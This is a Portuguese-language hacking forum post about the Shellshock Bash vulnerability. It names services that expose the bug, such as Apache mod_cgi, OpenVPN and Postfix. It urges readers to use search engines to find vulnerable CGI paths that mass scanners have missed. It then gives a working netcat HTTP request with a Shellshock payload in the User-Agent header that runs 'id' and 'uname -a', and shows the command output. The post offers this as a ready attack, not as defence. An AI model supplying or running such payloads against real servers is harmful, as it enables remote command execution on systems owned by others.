Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Shellshock

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Matéria Shellshock

    Nao encontrei nenhum material aqui no forum falando sobre o bug, mas este bug ja tem alguns meses e ainda existem milhares de servidores, modens, etc etc.

    Basta ter a versao do Bash desatualizada para explorar.

    Existem varios servicos que usam o BASH para processar e retornar resultados e ae que o bug é explorado.
    Os servicos em si nao estao vulneraveis mas eles sao a porta de entrada.

    apache mod_cgi
    openVPN
    PostFix
    Plataformas diversas (frameworks, modens, etc)

    Muitos hacks estao varrendo toda classe de IP na internet e enviando o exploit a procura do BUG, masss existem milhares de sites que para chamar o mod_cgi do apache tem que executar um link exato:

    ex: os caras estao scaneando GET / HTTP/1.1 mas os GET /linkx/linky HTTP/1.1 ainda estao totalmente livre dos scans e plataformas que tb exigem links diretos, ou seja, existem milhares de sites que os hacks ainda nao chegaram, agora a questao como chegar neles? heheheh GOOGLE ou outro motor ae é com vcssss

    Tudo que use o Bash para executar alguma coisa é um vetor de entrada.

    Explorar, voce pode usar o nc.exe (netcat.exe)


    nc 127.0.0.1 80

    GET / HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: pt-BR
    User-Agent: () { foo;};echo; /bin/bash -c "id;uname -a"
    Connection: keep-alive
    Host: 127.0.0.1

    ENTER

    uid=1003(local) gid=1003(local) groups=1003(local)
    Linux local 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010 x86_64 GNU/Linux

    é simples assim

    algumas referencias

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
X
Working...
X